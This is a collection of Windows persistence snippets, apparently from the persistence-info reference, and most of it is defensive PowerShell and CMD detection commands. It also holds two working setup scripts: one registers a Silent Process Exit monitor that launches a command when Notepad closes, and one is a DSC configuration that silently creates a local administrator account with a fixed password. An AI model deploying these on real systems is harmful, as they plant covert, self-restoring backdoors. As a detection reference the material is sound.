### List User Startup Folders - PowerShell

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Lists files and their properties within the current user's startup folder. It uses the .NET Environment class to get the startup path and then Get-ChildItem to list the contents.

```powershell
$startupPath = [Environment]::GetFolderPath('Startup')
Get-ChildItem -Path $startupPath -Force | Select-Object Name, FullName, CreationTime, LastWriteTime
```

--------------------------------

### Detect Windows Services Binary Paths (PowerShell)

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Detects potentially malicious Windows services by listing all services configured to start automatically and filtering for those with unusual binary paths. This helps identify services that might be used for persistence. The system32/SysWOW64 filter is only a first pass, since it also passes any ImagePath that merely contains those strings; verify the signature of the resolved binary for whatever remains.

```powershell
# Detection: Enumerate services and their configurations
# Location: HKLM\SYSTEM\CurrentControlSet\Services

# PowerShell - List all auto-start services with their binary paths
# (Get-CimInstance replaces the legacy Get-WmiObject, which PowerShell 7 no longer ships)
Get-CimInstance Win32_Service |
    Where-Object { $_.StartMode -eq "Auto" } |
    Select-Object Name, DisplayName, PathName, StartMode, State |
    Format-Table -AutoSize

# PowerShell - Find services with unusual binary paths
Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\*" |
    Where-Object { $_.ImagePath -and $_.ImagePath -notlike "*system32*" -and $_.ImagePath -notlike "*SysWOW64*" } |
    Select-Object PSChildName, ImagePath, Start, Type
```

--------------------------------

### List User Startup Folder - Command Prompt

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Lists files in the current user's startup folder using the Command Prompt. It utilizes the %appdata% environment variable.
```cmd
dir "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"
```

--------------------------------

### List All Users' Startup Folders - PowerShell

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Lists files and their properties in the startup folders for all users. This command requires administrative privileges and iterates through the standard user startup path pattern.

```powershell
Get-ChildItem "C:\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" -Force |
    Select-Object FullName, CreationTime, LastWriteTime
```

--------------------------------

### Check Environment Variables for Persistence (Command Prompt)

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Checks for the DOTNET_STARTUP_HOOKS environment variable using Command Prompt commands. It queries the registry directly for the variable. Note that when the variable is not set, `echo` prints the literal text `%DOTNET_STARTUP_HOOKS%` rather than an empty line, so the `reg query` result is the authoritative check.

```cmd
echo %DOTNET_STARTUP_HOOKS%
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v DOTNET_STARTUP_HOOKS
```

--------------------------------

### List Common Startup Folder (All Users) - PowerShell

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Lists files in the common startup folder accessible to all users. This command requires administrative privileges.

```powershell
Get-ChildItem "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp" -Force
```

--------------------------------

### Detect Windows Services Configuration (Command Prompt)

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Queries the configuration and status of a specific Windows service using the command prompt. This is useful for investigating individual services suspected of being used for persistence. From a PowerShell prompt, call `sc.exe` explicitly, because `sc` there is an alias for Set-Content.
```cmd
REM Command Prompt - Query specific service
sc qc "ServiceName"
sc query "ServiceName"
```

--------------------------------

### List All Scheduled Tasks - Command Prompt

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Lists all scheduled tasks using the Command Prompt's schtasks utility, providing detailed information in a list format.

```cmd
REM Command Prompt - List all tasks
schtasks /query /fo LIST /v
```

--------------------------------

### Detect Run and RunOnce Registry Keys (Command Prompt)

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Detects suspicious entries in the Run and RunOnce registry keys using the command prompt. This method queries the specified registry paths for auto-starting programs, providing a command-line alternative to PowerShell.

```cmd
REM Command Prompt - Query registry
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
```

--------------------------------

### Check Environment Variables for Persistence (PowerShell)

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Retrieves the DOTNET_STARTUP_HOOKS environment variable from both HKLM and HKCU registry hives to detect potential persistence. Handles cases where the variable might not exist.

```powershell
Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" | Select-Object DOTNET_STARTUP_HOOKS
Get-ItemProperty "HKCU:\Environment" -ErrorAction SilentlyContinue | Select-Object DOTNET_STARTUP_HOOKS
```

--------------------------------

### Detect Image File Execution Options (IFEO) Debugger (Command Prompt)

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Checks for Image File Execution Options (IFEO) persistence for a specific executable using the command prompt.
This command queries the 'Debugger' registry value for a given executable, helping to identify hijacked process launches.

```cmd
REM Command Prompt - Check specific executable
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger
```

--------------------------------

### Enumerate Startup Folder Contents (PowerShell)

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Detects user-level persistence by enumerating files within the Startup folder. Files placed in this folder execute automatically at user logon via explorer.exe.

```powershell
# Detection: Enumerate startup folder contents
# Location: %appdata%\Microsoft\Windows\Start Menu\Programs\Startup

# PowerShell - List startup folder items
Get-ChildItem -Path "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
```

--------------------------------

### Check DOTNET_STARTUP_HOOKS Environment Variable - PowerShell

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Checks for the presence and value of the DOTNET_STARTUP_HOOKS environment variable at the Machine, User, and Process levels. This variable is used for .NET startup hooks.

```powershell
# PowerShell - Check environment variables
[Environment]::GetEnvironmentVariable("DOTNET_STARTUP_HOOKS", "Machine")
[Environment]::GetEnvironmentVariable("DOTNET_STARTUP_HOOKS", "User")
[Environment]::GetEnvironmentVariable("DOTNET_STARTUP_HOOKS", "Process")
```

--------------------------------

### Configure Silent Process Exit Monitoring (PowerShell)

Source: https://github.com/persistence-info/persistence-info.github.io/blob/main/Data/silentexitmonitor.md

This PowerShell script configures the Windows registry to monitor the 'notepad.exe' process. When Notepad exits silently, it will launch a PowerShell command to execute 'calc.exe'. This involves setting specific values under 'Image File Execution Options' and 'SilentProcessExit' registry keys.
```powershell
$monitoredApp = "notepad.exe"
$monitor = "powershell -c calc.exe #"
New-Item -Force -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$monitoredApp" | Out-Null
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$monitoredApp" -Name GlobalFlag -Value 512
New-Item -Force -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\$monitoredApp" | Out-Null
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\$monitoredApp" -Name ReportingMode -Value 1
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\$monitoredApp" -Name MonitorProcess -Value $monitor
```

--------------------------------

### Detect Run and RunOnce Registry Keys (PowerShell)

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Detects suspicious entries in the Run and RunOnce registry keys, which are standard user-level persistence mechanisms that execute programs at user logon. This script queries the specified registry paths for auto-starting programs.
```powershell
# Detection: Query Run keys for suspicious entries
# Location: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# Location: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

# PowerShell - List all Run key entries for current user
Get-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -ErrorAction SilentlyContinue
Get-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" -ErrorAction SilentlyContinue
```

--------------------------------

### Configure DSC Local Configuration Manager for Persistence (PowerShell)

Source: https://github.com/persistence-info/persistence-info.github.io/blob/main/Data/desiredstateconfiguration.md

This script modifies the DSC Local Configuration Manager (LCM) to ensure configurations are applied and auto-corrected after reboots, setting the frequency for monitoring and changes. It's a prerequisite for establishing DSC-based persistence.

```powershell
# Change DSC Local Configuration Manager
[DSCLocalConfigurationManager()]
Configuration SetDSCLMConfig {
    node localhost {
        Settings {
            ActionAfterReboot              = 'ContinueConfiguration' # Might be already set
            AllowModuleOverWrite           = $true
            ConfigurationMode              = 'ApplyAndAutoCorrect'
            ConfigurationModeFrequencyMins = 15 # Change this
        }
    }
}
SetDSCLMConfig -OutputPath C:\foo\bar | Out-Null

# Setting the configuration manager
Set-DscLocalConfigurationManager -Path C:\foo\bar -ComputerName localhost
```

--------------------------------

### Detect Netsh Extension DLLs (PowerShell & CMD)

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Checks for registered netsh helper DLLs by querying the NetSh registry key. It lists the helper name and its associated DLL path. This can reveal malicious DLLs loaded when netsh.exe is executed.
```powershell
# Detection: Check registered netsh helper DLLs
# Location: HKLM\SOFTWARE\Microsoft\NetSh

# PowerShell - Enumerate netsh extensions
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\NetSh" |
    Select-Object -Property * -ExcludeProperty PS* |
    Get-Member -MemberType NoteProperty |
    ForEach-Object {
        $name  = $_.Name
        $value = (Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\NetSh").$name
        [PSCustomObject]@{
            HelperName = $name
            DLLPath    = $value
        }
    }
```

```cmd
reg query "HKLM\SOFTWARE\Microsoft\NetSh"
```

--------------------------------

### Export Specific Scheduled Task - Command Prompt

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Exports a specific scheduled task to an XML file for detailed analysis. Replace 'TaskName' with the actual name of the task.

```cmd
REM Export specific task for analysis
schtasks /query /tn "TaskName" /xml
```

--------------------------------

### Quick PowerShell Profile Check - PowerShell

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Performs a quick check for the existence of the current user's PowerShell profile and displays its content if found.

```powershell
# Quick check for profile existence
Test-Path $PROFILE

# View current user profile
if (Test-Path $PROFILE) { Get-Content $PROFILE }
```

--------------------------------

### Create Malicious DSC Configuration for Persistence (PowerShell)

Source: https://github.com/persistence-info/persistence-info.github.io/blob/main/Data/desiredstateconfiguration.md

This PowerShell configuration defines a malicious DSC resource that adds a specified user to the local administrators group and creates a file to log execution. This is used after configuring the DSC LCM for persistence.

```powershell
Configuration NotMalicious {
    Node localhost {
        Script ScriptExample {
            SetScript = {
                $username = "ITadmin"
                $password = ConvertTo-SecureString "password123!!" -AsPlainText -Force
                $exist = Get-LocalUser -Name $username -ErrorAction SilentlyContinue
                if ($exist -eq $null) {
                    New-LocalUser -Name $username -Password $password -FullName "Real IT admin"
                    Add-LocalGroupMember -Group "Administrators" -Member $username
                }
                Write-Output "$(whoami) just added ITadmin" > C:\foo\bar\dsc.txt
            }
            TestScript = { return ($exist -ne $null) }
            GetScript  = { @{ Result = ($exist -ne $null) } }
        }
    }
}
NotMalicious -OutputPath C:\foo\bar | Out-Null

# Start the configuration
Start-DscConfiguration -Path "C:\foo\bar" -ComputerName localhost | Out-Null
```

--------------------------------

### List All Scheduled Tasks - PowerShell

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Enumerates all scheduled tasks on the system, displaying their name, path, state, actions, and trigger count. This helps in identifying potentially malicious scheduled tasks.

```powershell
# PowerShell - List all scheduled tasks
Get-ScheduledTask |
    Select-Object TaskName, TaskPath, State,
        @{N='Actions';  E={$_.Actions.Execute}},
        @{N='Triggers'; E={$_.Triggers.Count}} |
    Format-Table -AutoSize
```

--------------------------------

### Detect Image File Execution Options (IFEO) Debugger (PowerShell)

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Detects Image File Execution Options (IFEO) persistence by enumerating all IFEO entries that have a 'Debugger' value specified. This admin-level persistence technique hijacks executable launches by specifying a debugger that runs instead of the target process.
```powershell
# Detection: Check for Debugger values in IFEO subkeys
# Location: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

# PowerShell - Enumerate all IFEO entries with Debugger value
Get-ChildItem "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | ForEach-Object {
    $debugger = Get-ItemProperty -Path $_.PSPath -Name "Debugger" -ErrorAction SilentlyContinue
    if ($debugger) {
        [PSCustomObject]@{
            ImageName = $_.PSChildName
            Debugger  = $debugger.Debugger
        }
    }
}
```

--------------------------------

### Detect Screen Saver Configuration (Command Prompt)

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Detects screen saver persistence by querying the screensaver executable name and its active status using the command prompt. This checks the user's control panel desktop registry settings.

```cmd
REM Command Prompt
reg query "HKCU\Control Panel\Desktop" /v SCRNSAVE.EXE
reg query "HKCU\Control Panel\Desktop" /v ScreenSaveActive
```

--------------------------------

### Detect Print Monitor DLLs (PowerShell)

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Enumerates registered print monitors and their associated DLLs by querying the Print Monitors registry key. It also verifies whether the DLLs are signed by Microsoft. This helps identify malicious DLLs loaded by the print spooler service.
```powershell
# Detection: Enumerate registered print monitors
# Location: HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors

# PowerShell - List all print monitors and their DLLs
Get-ChildItem "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors" | ForEach-Object {
    $driver = Get-ItemProperty -Path $_.PSPath -Name "Driver" -ErrorAction SilentlyContinue
    [PSCustomObject]@{
        MonitorName = $_.PSChildName
        Driver      = $driver.Driver
    }
}

# Verify DLLs are signed Microsoft binaries
# (the Driver value is a bare DLL name that the spooler loads from System32)
Get-ChildItem "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors" | ForEach-Object {
    $driver = (Get-ItemProperty -Path $_.PSPath -Name "Driver" -ErrorAction SilentlyContinue).Driver
    if ($driver) {
        $fullPath = "C:\Windows\System32\$driver"
        $sig = Get-AuthenticodeSignature $fullPath -ErrorAction SilentlyContinue
        [PSCustomObject]@{
            Monitor         = $_.PSChildName
            DLL             = $driver
            SignatureStatus = $sig.Status
            Signer          = $sig.SignerCertificate.Subject
        }
    }
}
```

--------------------------------

### Detect File Extension Hijacking (PowerShell & CMD)

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Detects file extension hijacking by checking file type associations in the registry. It queries common file types like .txt, .html, .bat, etc., for their associated open commands. This helps identify malicious code executed when users open common file types.
```powershell
# Detection: Check file type associations for common extensions
# Location: HKCU\Software\Classes\<ProgID>\shell\open\command (per-user override of the
#           machine-wide HKLM\Software\Classes entry; HKCR shows the merged view)
#           e.g. HKCU\Software\Classes\txtfile\shell\open\command

# PowerShell - Check text file handler
Get-ItemProperty -Path "HKCU:\Software\Classes\txtfile\shell\open\command" -ErrorAction SilentlyContinue

# Check multiple common file types
@('txtfile', 'htmlfile', 'batfile', 'cmdfile', 'jsfile', 'vbsfile') | ForEach-Object {
    $path = "HKCU:\Software\Classes\$_\shell\open\command"
    $handler = Get-ItemProperty -Path $path -ErrorAction SilentlyContinue
    if ($handler) {
        [PSCustomObject]@{
            FileType = $_
            Command  = $handler.'(default)'
        }
    }
}
```

```cmd
REM Command Prompt - Check specific association
assoc .txt
ftype txtfile
```

--------------------------------

### Detect AMSI Providers (PowerShell)

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Enumerates AMSI provider registrations by querying the AMSI Providers and CLSID registry keys. It lists the CLSID and the corresponding DLL path, helping to identify malicious AMSI providers loaded into processes.

```powershell
# Detection: Enumerate AMSI provider registrations
# Location: HKLM\SOFTWARE\Microsoft\AMSI\Providers
# Location: HKLM\SOFTWARE\Classes\CLSID

# PowerShell - List AMSI providers
Get-ChildItem "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -ErrorAction SilentlyContinue | ForEach-Object {
    $clsid = $_.PSChildName
    $clsidPath = "HKLM:\SOFTWARE\Classes\CLSID\$clsid\InprocServer32"
    $dll = (Get-ItemProperty -Path $clsidPath -ErrorAction SilentlyContinue).'(default)'
    [PSCustomObject]@{
        CLSID   = $clsid
        DLLPath = $dll
    }
}

# Expected legitimate output:
# CLSID                                  DLLPath
# -----                                  -------
# {2781761E-28E0-4109-99FE-B9D127C57AFE} C:\ProgramData\Microsoft\Windows Defender\...
```

--------------------------------

### Detect svchost Service DLLs (PowerShell)

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Analyzes svchost.exe service configurations by enumerating services and checking their 'ServiceDll' registry values. This helps identify custom DLLs loaded by svchost.exe, which can be a persistence mechanism.

```powershell
# PowerShell - Analyze svchost service DLLs
Get-ChildItem "HKLM:\SYSTEM\CurrentControlSet\Services" | ForEach-Object {
    $params = Get-ItemProperty -Path "$($_.PSPath)\Parameters" -ErrorAction SilentlyContinue
    if ($params.ServiceDll) {
        [PSCustomObject]@{
            ServiceName = $_.PSChildName
            ServiceDll  = $params.ServiceDll
        }
    }
}
```

--------------------------------

### Check PowerShell Profile Locations - PowerShell

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Checks all standard PowerShell profile locations for existence and retrieves their content if they exist. This is useful for detecting persistence via PowerShell profiles.

```powershell
# PowerShell - Check all profile paths
$profilePaths = @(
    $PROFILE.AllUsersAllHosts,
    $PROFILE.AllUsersCurrentHost,
    $PROFILE.CurrentUserAllHosts,
    $PROFILE.CurrentUserCurrentHost
)
$profilePaths | ForEach-Object {
    [PSCustomObject]@{
        ProfilePath = $_
        Exists      = Test-Path $_
        Content     = if (Test-Path $_) { Get-Content $_ -Raw } else { "N/A" }
    }
}
```

--------------------------------

### Detect Password Filter DLLs (PowerShell)

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Detects registered password filter DLLs by querying the LSA registry key. It lists the DLLs and verifies their existence in the System32 directory. Legitimate outputs include 'scecli' and 'rassfm'.
```powershell
# Detection: Check registered password filter DLLs
# Location: HKLM\SYSTEM\CurrentControlSet\Control\Lsa

# PowerShell - Query Notification Packages (password filters)
$lsa = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa"
$lsa.'Notification Packages'

# Expected legitimate output:
# scecli
# rassfm

# Verify each DLL exists in System32
$lsa.'Notification Packages' | ForEach-Object {
    $dllPath = "C:\Windows\System32\$_.dll"
    [PSCustomObject]@{
        DLLName = $_
        Exists  = Test-Path $dllPath
        Path    = $dllPath
    }
}
```

```cmd
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages"
```

--------------------------------

### Monitor Desired State Configuration (DSC) for Persistence (PowerShell)

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Monitors Desired State Configuration (DSC) settings to detect persistence mechanisms. Specifically checks if the ConfigurationMode is set to 'ApplyAndAutoCorrect', which enables automatic state restoration.
```powershell
# Detection: Check DSC Local Configuration Manager status
# Requires: PowerShell 4.0+, WinRM enabled

# PowerShell - Get current DSC configuration
Get-DscLocalConfigurationManager |
    Select-Object ConfigurationMode, ConfigurationModeFrequencyMins, RefreshMode, RebootNodeIfNeeded

# Check current DSC configuration status
Get-DscConfigurationStatus -ErrorAction SilentlyContinue

# View applied configuration
Get-DscConfiguration -ErrorAction SilentlyContinue

# List DSC resources available on the host (not only those in use)
Get-DscResource

# Check for suspicious ConfigurationMode (ApplyAndAutoCorrect enables persistence)
$lcm = Get-DscLocalConfigurationManager
if ($lcm.ConfigurationMode -eq "ApplyAndAutoCorrect") {
    Write-Warning "DSC is set to auto-correct - potential persistence mechanism"
    $lcm | Format-List *
}
```

--------------------------------

### Detect Screen Saver Configuration (PowerShell)

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Detects screen saver persistence by querying the relevant registry settings in the user's control panel desktop configuration. This checks for the screensaver executable name and its active status.

```powershell
# Detection: Check screensaver registry settings
# Location: HKCU\Control Panel\Desktop

# PowerShell - Query screensaver configuration
Get-ItemProperty -Path "HKCU:\Control Panel\Desktop" |
    Select-Object SCRNSAVE.EXE, ScreenSaveActive, ScreenSaverIsSecure, ScreenSaveTimeOut
```

--------------------------------

### Enumerate Silent Process Exit Monitors - PowerShell

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Enumerates configured Silent Process Exit monitors by checking the relevant registry key. It displays the process name, reporting mode, and the monitor process.
```powershell
# PowerShell - Enumerate Silent Process Exit monitors
Get-ChildItem "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit" -ErrorAction SilentlyContinue | ForEach-Object {
    $props = Get-ItemProperty -Path $_.PSPath
    [PSCustomObject]@{
        ProcessName    = $_.PSChildName
        ReportingMode  = $props.ReportingMode
        MonitorProcess = $props.MonitorProcess
    }
}
```

--------------------------------

### Check for GlobalFlag Silent Exit Monitor - PowerShell

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Checks for the presence of the GlobalFlag registry value, specifically looking for the bit that indicates Silent Process Exit monitoring (512). This is done under Image File Execution Options.

```powershell
# Check for GlobalFlag (512 = FLG_MONITOR_SILENT_PROCESS_EXIT)
Get-ChildItem "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | ForEach-Object {
    $flag = (Get-ItemProperty -Path $_.PSPath -Name "GlobalFlag" -ErrorAction SilentlyContinue).GlobalFlag
    if ($flag -band 512) {
        [PSCustomObject]@{
            ProcessName       = $_.PSChildName
            GlobalFlag        = $flag
            SilentExitMonitor = $true
        }
    }
}
```

--------------------------------

### Bypass PowerShell Profiles - PowerShell

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Executes a PowerShell command while bypassing any profile scripts. This is useful for testing or running commands without profile interference.

```powershell
powershell.exe -NoProfile -Command "Get-Process"
```

--------------------------------

### Find Suspicious Scheduled Tasks - PowerShell

Source: https://context7.com/persistence-info/persistence-info.github.io/llms.txt

Filters scheduled tasks to find those whose actions do not appear to be related to Microsoft or Windows processes. This can help pinpoint custom or malicious tasks. Note that the keyword filter also hides any task whose action path merely contains "Microsoft" or "Windows" (for example a binary under C:\Windows\Temp), so treat the result as a triage view rather than a complete check.
```powershell
# Find tasks with suspicious characteristics
Get-ScheduledTask | ForEach-Object {
    $task = $_
    # Pipe the task object in; Get-ScheduledTaskInfo binds it via -InputObject
    $info = $task | Get-ScheduledTaskInfo -ErrorAction SilentlyContinue
    [PSCustomObject]@{
        TaskName    = $task.TaskName
        TaskPath    = $task.TaskPath
        State       = $task.State
        LastRunTime = $info.LastRunTime
        NextRunTime = $info.NextRunTime
        Actions     = ($task.Actions | ForEach-Object { $_.Execute }) -join "; "
        RunLevel    = $task.Principal.RunLevel
        UserId      = $task.Principal.UserId
    }
} | Where-Object { $_.Actions -notlike "*Microsoft*" -and $_.Actions -notlike "*Windows*" }
```
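As an added example (not one of the persistence-info snippets), the following extends the keyword filter above: each task action is resolved to the file it actually launches, which is then checked for existence, Authenticode signature and location outside the Windows directory, in the same way the print monitor snippet checks its DLLs. `Resolve-ActionExecutable` and `Get-TaskActionReport` are helper names chosen here, not part of the ScheduledTasks module.

```powershell
# Added example, not from persistence-info. Run as administrator for full task coverage.

function Resolve-ActionExecutable {
    param([string]$Execute)
    if ([string]::IsNullOrWhiteSpace($Execute)) { return $null }
    # Task actions may carry environment variables ("%SystemRoot%\system32\cmd.exe") and quotes.
    $expanded = [Environment]::ExpandEnvironmentVariables($Execute).Trim('"', ' ')
    if (Test-Path -LiteralPath $expanded -PathType Leaf) {
        return (Get-Item -LiteralPath $expanded).FullName
    }
    # Bare names such as "cmd.exe" or "powershell" resolve through PATH, as the scheduler does.
    $cmd = Get-Command $expanded -CommandType Application -ErrorAction SilentlyContinue |
        Select-Object -First 1
    if ($cmd) { return $cmd.Source }
    return $expanded   # unresolved: report the literal value and let the analyst decide
}

function Get-TaskActionReport {
    $windowsDir = [Environment]::GetFolderPath('Windows')
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            # Only Exec actions carry an Execute property; COM handler actions expose a ClassId.
            if (-not $action.PSObject.Properties['Execute']) { continue }
            $exe    = Resolve-ActionExecutable $action.Execute
            $exists = $exe -and (Test-Path -LiteralPath $exe -PathType Leaf)
            $sig    = if ($exists) { Get-AuthenticodeSignature -FilePath $exe -ErrorAction SilentlyContinue }
            [PSCustomObject]@{
                TaskName        = $task.TaskName
                TaskPath        = $task.TaskPath
                State           = $task.State
                RunAs           = $task.Principal.UserId
                RunLevel        = $task.Principal.RunLevel
                Executable      = $exe
                Arguments       = $action.Arguments
                Exists          = [bool]$exists
                SignatureStatus = if ($sig) { $sig.Status } else { 'NotChecked' }
                Signer          = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }
                OutsideWindows  = [bool]($exe -and -not $exe.StartsWith($windowsDir, [StringComparison]::OrdinalIgnoreCase))
            }
        }
    }
}

# Triage view: anything unsigned, missing or living outside %SystemRoot% deserves a look,
# whether or not the word "Microsoft" appears in its path.
Get-TaskActionReport |
    Where-Object { $_.SignatureStatus -ne 'Valid' -or $_.OutsideWindows -or -not $_.Exists } |
    Sort-Object TaskPath, TaskName |
    Format-Table TaskName, RunAs, Executable, SignatureStatus, OutsideWindows -AutoSize
```

Files under %SystemRoot% are often catalog-signed rather than embedded-signed; Get-AuthenticodeSignature consults the catalogs, so a `Valid` status there is still meaningful.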